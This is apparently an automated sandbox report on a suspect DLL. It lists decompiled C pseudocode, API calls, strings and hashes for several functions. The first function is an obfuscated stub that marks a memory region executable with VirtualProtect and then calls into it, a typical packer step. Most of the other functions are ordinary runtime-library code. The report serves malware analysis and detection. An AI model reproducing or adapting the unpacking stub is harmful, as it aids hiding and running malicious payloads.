				_t145 = _v12 * 0x10e1d;
				 *0x6d545a00 = _t139;
				_t140 =  *0x6d55c8d0; // 0x6d5486a0
				 *0x6d545a04 = _t130 -  *0x6d545a04 + 0x11;
				 *0x6d548698 = _t140;
				 *0x6d5459d8 = E6D4A01E0(_v12 * 0x10e1d, 0, _t130,  *0x6d5459dc);
				 *0x6d5459dc = _t130;
				VirtualProtect(_t140, 0x305a, 0x40, 0x6d54869c);
				_t131 =  *0x6d5459d0; // 0x43d0c569
				_t46 = 6;
				_v24 = _t131;
				_t154 =  *0x6d545a02 - _t46; // 0x13ae
				if(_t154 == 0) {
					_t47 =  *0x6d545a90; // 0x43cef7fd
					 *0x6d545a00 = _t47 + 0x11dde + _t131;
				} else {
					 *0x6d545a90 =  *0x6d545a90 +  ~_t131 -  *0x6d545a00 * 0x3d;
				}
				_t107 =  *0x6d5459d8; // 0x914ee6d4
				_t132 =  *0x6d5459e6 & 0x0000ffff;
				_v5 = _t131 + _t107;
				if(( *0x6d5459f2 & 0x0000ffff) + ( *0x6d5459e6 & 0x0000ffff) != 0x32) {
					_t53 = E6D4A01E0(_t145, 0, _t107,  *0x6d5459dc);
					_v16 = _t53;
					_v20 = _t53 * 0x00000037 & 0x0000ffff;
				} else {
					_t98 =  *0x6d5459dc; // 0x3
					_t100 = E6D4A01E0(E6D4A01E0(_t107, _t98, _t107, _t98), _t132, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t100 + _v12 + 0xf;
				}
				_t141 = 0x6d5459e6;
				_t110 = _v16;
				_t135 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t135;
				 *0x6d545a04 = _t135;
				_t156 =  *0x6d545a04 - 0x1b47; // 0x94
				if(_t156 != 0) {
					_t61 = _v20;
				} else {
					asm("cdq");
					_t135 = _v24;
					_t124 = _t110 + ( *0x6d5459e6 & 0x0000ffff);
					_v16 = _t124;
					_t61 = _v20 + _t124 * 2 + 0x3b;
				}
				_t111 = 6;
				_t157 =  *0x6d545a02 - _t111; // 0x13ae
				if(_t157 == 0) {
					 *0x6d545a00 = (_t61 & 0x0000ffff) + 0x11dde + (_t135 & 0x000000ff);
				}
				_t112 =  *0x6d5459d0; // 0x43d0c569
				 *0x6d5459dc =  *0x6d5459dc & 0x00000000;
				_t146 = _v16 + 0x00000005 + _t112 & 0x0000ffff;
				 *0x6d5459d8 = _t146 - _v12 - 0x54;
				 *0x6d5459d0 = _t112 + 0x23bbc + (_t135 & 0x000000ff) * 2;
				 *0x6d548698();
				_t71 =  *0x6d5459d0; // 0x43d0c569
				_t136 = _v12;
				 *0x6d5459d8 =  *0x6d5459d8 + _t71 + 0x3b + ( *0x6d545a04 & 0x000000ff);
				_t74 =  *0x6d5459e6 & 0x0000ffff;
				asm("adc dword [0x6d5459dc], 0x0");
				do {
					if(_t136 == _t74) {
						goto L22;
					} else {
						_t146 = ( *_t141 & 0x0000ffff) * (_t146 & 0x0000ffff) & 0x0000ffff;
						_t118 = _t136 + 5 + _t146;
						 *0x6d5459dc = 0;
						_t89 =  *0x6d5459f0; // 0x99320090
						asm("cdq");
						 *0x6d5459d8 = _t118;
						if(_t118 != (_t89 & 0x0000ffff) || 0 != _t136) {
							_t74 =  *0x6d5459e6 & 0x0000ffff;
							_t136 = _v12;
							goto L22;
						}
					}
					break;
					L22:
					_t141 =  &(_t141[1]);
				} while (_t141 < 0x6d545a44);
				 *(_t136 + 0x16) =  *(_t136 + 0x16) ^ 0x000000d0;
				_t119 =  *0x6d5459d8; // 0x914ee6d4
				_t137 =  *0x6d5459d0; // 0x43d0c569
				_push(0);
				asm("adc [0x6d5459dc], eax");
				 *0x6d5459d8 = _t119 + (_t146 - _t119 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t137;
				_t82 = ((_t137 & 0x000000ff) * ( *0x6d545a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6d545a04 = _t82;
				_t85 = (_t82 & 0x000000ff) * 0x36 + _t137;
				 *0x6d5459d0 = _t85;
				return _t85;
			}

0x6d47f21e
0x6d47f225
0x6d47f228
0x6d47f22a
0x6d47f22c
0x6d47f233
0x6d47f239
0x6d47f23f
0x6d47f245
0x6d47f248
0x6d47f24b
0x6d47f24d
0x6d47f257
0x6d47f25a
0x6d47f25d
0x6d47f260
0x6d47f268
0x6d47f26a
0x6d47f272
0x6d47f274
0x6d47f277
0x00000000
0x6d47f277
0x6d47f24f
0x6d47f24f
0x6d47f255
0x00000000
0x00000000
0x00000000
0x00000000
0x6d47f255
0x00000000
0x6d47f27a
0x6d47f27a
0x6d47f27d
0x6d47f28b
0x6d47f29c
0x6d47f2a2
0x6d47f2a8
0x6d47f2b2
0x6d47f2ca
0x6d47f2cf
0x6d47f2d5
0x6d47f2db
0x6d47f2e3
0x6d47f2e4
0x6d47f2e7
0x6d47f2ee
0x6d47f305
0x6d47f311
0x6d47f2f0
0x6d47f2fd
0x6d47f2fd
0x6d47f316
0x6d47f31f
0x6d47f326
0x6d47f335
0x6d47f36b
0x6d47f370
0x6d47f379
0x6d47f337
0x6d47f337
0x6d47f34e
0x6d47f356
0x6d47f35c
0x6d47f35c
0x6d47f385
0x6d47f395
0x6d47f3a0
0x6d47f3a2
0x6d47f3a5
0x6d47f3ab
0x6d47f3b2
0x6d47f3cf
0x6d47f3b4
0x6d47f3bb
0x6d47f3bc
0x6d47f3bf
0x6d47f3c4
0x6d47f3ca
0x6d47f3ca
0x6d47f3d4
0x6d47f3d5
0x6d47f3dc
0x6d47f3eb
0x6d47f3eb
0x6d47f3f3
0x6d47f3fc
0x6d47f405
0x6d47f416
0x6d47f421
0x6d47f426
0x6d47f42c
0x6d47f43b
0x6d47f440
0x6d47f446
0x6d47f44d
0x6d47f454
0x6d47f456
0x00000000
0x6d47f458
0x6d47f461
0x6d47f469
0x6d47f46d
0x6d47f472
0x6d47f47a
0x6d47f47b
0x6d47f483
0x6d47f48b
0x6d47f492
0x00000000
0x6d47f492
0x6d47f483
0x00000000
0x6d47f495
0x6d47f495
0x6d47f498
0x6d47f4a0
0x6d47f4a4
0x6d47f4aa
0x6d47f4b3
0x6d47f4c5
0x6d47f4d2
0x6d47f4e3
0x6d47f4e6
0x6d47f4f1
0x6d47f4f3
0x6d47f4f9

APIs

VirtualProtect.KERNEL32(6D5486A0,0000305A,00000040,6D54869C,?,00000000,914EE6D4,008B9932,?), ref: 6D47F2D5

Strings

DZTm, xrefs: 6D47F27D
DZTm, xrefs: 6D47F498
E, xrefs: 6D47F239, 6D47F385

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZTm$DZTm$E
API String ID: 544645111-2789780252
Opcode ID: e9d55c8151c40fcc33d7f87b8ff0d37e22b6c67b4a2a3c1b604067c7c1c9f913
Instruction ID: 73c71d60fa18f8736f22f6c2c61d0d33c9e0daf5e5b3b3ea1fa0142bcea8d3bc
Opcode Fuzzy Hash: e9d55c8151c40fcc33d7f87b8ff0d37e22b6c67b4a2a3c1b604067c7c1c9f913
Instruction Fuzzy Hash: 1B81E371A021519FCF04EF69C881BBD7BF4BB56325B26812BE441DBBC1E3349984CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6D484267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D484267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6D4A0117(0x6d4e80ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6d546b60;
				_t65 = E6D4C1EEC(L"For");
				_t38 =  *0x6d546b60; // 0x6d4eaabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6d546b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6d546b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6d546b60
				_push( *_t8);
				E6D48220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6d546b60; // 0x6d4eaabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6d546b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6d546b98; // 0x6d546bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6d546b60; // 0x6d4eaabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6d546ba0; // 0x20
										_t25 = _t55 + 0x6d546b98; // 0x6d546bb0
										_t56 = E6D483F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6d546ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6d546b98; // 0x6d546bb0
								_t59 = E6D483F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6d546b60; // 0x6d4eaabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6d546b60; // 0x6d4eaabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6d546b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6d546b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6d546b60; // 0x6d4eaabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6D483A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6D4821C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6D4A0075( *((intOrPtr*)(_t85 - 0x14)));
			}

0x6d48426e
0x6d484278
0x6d484287
0x6d484289
0x6d48428e
0x6d484291
0x6d484291
0x6d484294
0x6d484294
0x6d48429a
0x6d48429a
0x6d4842a0
0x6d4842a2
0x6d4842ba
0x6d4842ba
0x6d4842bd
0x6d4842c2
0x6d4842c5
0x6d4842a4
0x6d4842a4
0x6d4842b4
0x6d4842b4
0x6d4842b6
0x6d4842a6
0x6d4842a8
0x00000000
0x6d4842aa
0x6d4842aa
0x6d4842ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4842ac
0x6d4842a8
0x6d4842a4
0x6d4842c8
0x6d4842c8
0x6d4842ce
0x6d4842d3
0x6d4842da
0x6d4842e4
0x6d4842e8
0x6d4842ee
0x6d4842f1
0x6d4842fc
0x6d4842ff
0x6d48433c
0x6d48433c
0x6d48433c
0x6d484343
0x6d484350
0x6d484353
0x6d484356
0x00000000
0x6d484358
0x6d484358
0x6d48435a
0x00000000
0x6d48435c
0x6d48435c
0x6d48435c
0x6d48435e
0x00000000
0x00000000
0x6d484360
0x6d484366
0x6d484366
0x6d48436b
0x6d48436b
0x6d48436e
0x6d484375
0x6d48437c
0x6d484389
0x6d48438c
0x6d484393
0x6d484396
0x00000000
0x00000000
0x00000000
0x00000000
0x6d484362
0x6d484362
0x6d484364
0x00000000
0x00000000
0x00000000
0x00000000
0x6d484364
0x00000000
0x6d484360
0x6d48439b
0x6d48439b
0x6d48435a
0x6d484301
0x6d484301
0x6d484301
0x6d484303
0x00000000
0x00000000
0x6d484305
0x6d48430b
0x6d48430b
0x6d48430b
0x6d48430e
0x6d48430e
0x6d484315
0x6d48431c
0x6d484329
0x6d48432c
0x6d48438e
0x6d484390
0x6d48432e
0x6d48432e
0x6d484334
0x6d484337
0x00000000
0x6d484337
0x6d484307
0x6d484307
0x6d484309
0x00000000
0x00000000
0x00000000
0x00000000
0x6d484309
0x00000000
0x6d484305
0x00000000
0x6d484301
0x6d48439d
0x6d48439d
0x6d4843a2
0x6d4843a2
0x6d4843a5
0x6d4843ab
0x6d4843d6
0x6d4842dc
0x6d4842de
0x6d4842de
0x6d4843d9
0x6d4843df
0x6d4843e5
0x6d4843eb
0x6d4843f3
0x6d484400

APIs

__EH_prolog3_catch.LIBCMT ref: 6D48426E
_wcslen.LIBCMT ref: 6D484281

Strings

For, xrefs: 6D484273, 6D484349
`kTm, xrefs: 6D4842C8

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`kTm
API String ID: 1260878687-401955702
Opcode ID: f754481efac48e79561b579855f92cd0e623dd6ba06c492f3ea5485258eecb51
Instruction ID: ef542f1e23634fc6566887ff0bda92040e26853422f7795ea999a288b8ddeb0a
Opcode Fuzzy Hash: f754481efac48e79561b579855f92cd0e623dd6ba06c492f3ea5485258eecb51
Instruction Fuzzy Hash: D541E13960470DCBCB11DB98C590EACB7B6BB5E7E4B258149E5589B792CB30DC42CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6D4D8AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t10 ^ _t49;
				 *0x6d545384 =  *0x6d545384 | 0xffffffff;
				 *0x6d545378 =  *0x6d545378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6d547a10 = 0;
				_t14 = E6D4D1216(0x6d4f2130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6d4f2130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6D4CF26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6D4D1216(0x6d4f2130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6d4f2130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6D4CCBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6D4CCBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6D4D8951(0x6d4f2130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6D4D877C(0x6d4f2130, _t37, _t57);
					}
				}
				E6D4CCBD3(_t43);
				_pop(_t44);
				return E6D49F8A5(_v8 ^ _t47, _t35, _t44);
			}

0x6d4d8aac
0x6d4d8aaf
0x6d4d8ab7
0x6d4d8abe
0x6d4d8ac1
0x6d4d8ace
0x6d4d8ad5
0x6d4d8ad7
0x6d4d8add
0x6d4d8aec
0x6d4d8af3
0x6d4d8afd
0x6d4d8b07
0x6d4d8b0a
0x6d4d8b17
0x6d4d8b1a
0x6d4d8b1c
0x6d4d8b35
0x6d4d8b3d
0x6d4d8b3f
0x6d4d8b45
0x6d4d8b4a
0x6d4d8b41
0x6d4d8b41
0x00000000
0x6d4d8b41
0x6d4d8b1e
0x6d4d8b1e
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b4c
0x6d4d8aff
0x6d4d8aff
0x6d4d8aff
0x6d4d8b59
0x6d4d8b5b
0x6d4d8b5f
0x6d4d8b6f
0x6d4d8b6f
0x6d4d8b61
0x6d4d8b61
0x6d4d8b64
0x00000000
0x6d4d8b66
0x6d4d8b66
0x6d4d8b67
0x6d4d8b6c
0x6d4d8b64
0x6d4d8b75
0x6d4d8b7f
0x6d4d8b8b

APIs

_free.LIBCMT ref: 6D4D8B1F
_free.LIBCMT ref: 6D4D8B75

Part of subcall function 6D4D8951: _free.LIBCMT ref: 6D4D89A9
Part of subcall function 6D4D8951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
Part of subcall function 6D4D8951: WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
Part of subcall function 6D4D8951: WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60

Strings

0!Om, xrefs: 6D4D8AD8

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!Om
API String ID: 314583886-2885829957
Opcode ID: 0026e2641dfb833ec85459a249884b043d08268fa42cc8ced768b2566f765908
Instruction ID: 35ef13777fcbb48592c08ac7717ce40a482faead7afb13ca20ccd993df11ec08
Opcode Fuzzy Hash: 0026e2641dfb833ec85459a249884b043d08268fa42cc8ced768b2566f765908
Instruction Fuzzy Hash: 95212EB2C08219A7DB61D6688C51EFBB778DF82724F120299F694A6240EF704DC1C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6D461EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E6D461EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6D461CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6D461EBD(_t24, _t31, _t19);
						_push(0x6d543568);
						_push( &_v32);
					}
					E6D4A3D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

0x6d461eea
0x6d461ef3
0x6d461ef6
0x6d461efd
0x6d461eff
0x6d461f47
0x6d461f01
0x6d461f05
0x6d461f4a
0x6d461f4c
0x6d461f07
0x6d461f0a
0x6d461f20
0x6d461f0c
0x6d461f0c
0x6d461f0c
0x6d461f29
0x6d461f32
0x6d461f35
0x6d461f3a
0x6d461f42
0x6d461f42
0x6d461f4e
0x6d461f53
0x6d461f57
0x6d461f57

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D461F4E

Strings

ios_base::badbit set, xrefs: 6D461F0C, 6D461F31
ios_base::failbit set, xrefs: 6D461F16
ios_base::eofbit set, xrefs: 6D461F1B

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: e834367e8567e4e2444066b32b6eb4d8ba3e486f69a4a25bee49e583b73a50ab
Instruction ID: 8f5cd1dbfea4aec791d0285c22fe1fec9352b09c8922660a99fd357d9f078f89
Opcode Fuzzy Hash: e834367e8567e4e2444066b32b6eb4d8ba3e486f69a4a25bee49e583b73a50ab
Instruction Fuzzy Hash: 4AF02DB3D042457ADB08D978C802FED33985B44314F148459EA539B182F765EC02CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6D48407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6D48407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6D4A00AC(0x6d4e808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6D485192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6D4C1D60("[json.exception."));
				E6D482D14(_t30, "[json.exception.", E6D4C1D60("[json.exception."));
				E6D481F57( *((intOrPtr*)(_t33 + 8)));
				return E6D4A0075(_t30);
			}

0x6d484084
0x6d484089
0x6d48408b
0x6d484090
0x6d484093
0x6d484096
0x6d48409d
0x6d4840a4
0x6d4840a8
0x6d4840c0
0x6d4840d0
0x6d4840d8
0x6d4840e4

APIs

__EH_prolog3.LIBCMT ref: 6D484084
_strlen.LIBCMT ref: 6D4840AF
_strlen.LIBCMT ref: 6D4840C6

Strings

[json.exception., xrefs: 6D48409F, 6D4840A7, 6D4840C5, 6D4840CD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 4e5294a9d03aaee277b972c11aa41121be4c354e52aa03692be3c77340fdc4ba
Instruction ID: 6649a8bc66c9d2049c3faa84d305a33c60b057c34159dcdde10f2931f45a702d
Opcode Fuzzy Hash: 4e5294a9d03aaee277b972c11aa41121be4c354e52aa03692be3c77340fdc4ba
Instruction Fuzzy Hash: 49F090B0A08205AFCB04DF38D840EBEB6E9BF84248F46051EE109D7246DBB49D0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CF345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6D4CF345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6D4B1F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
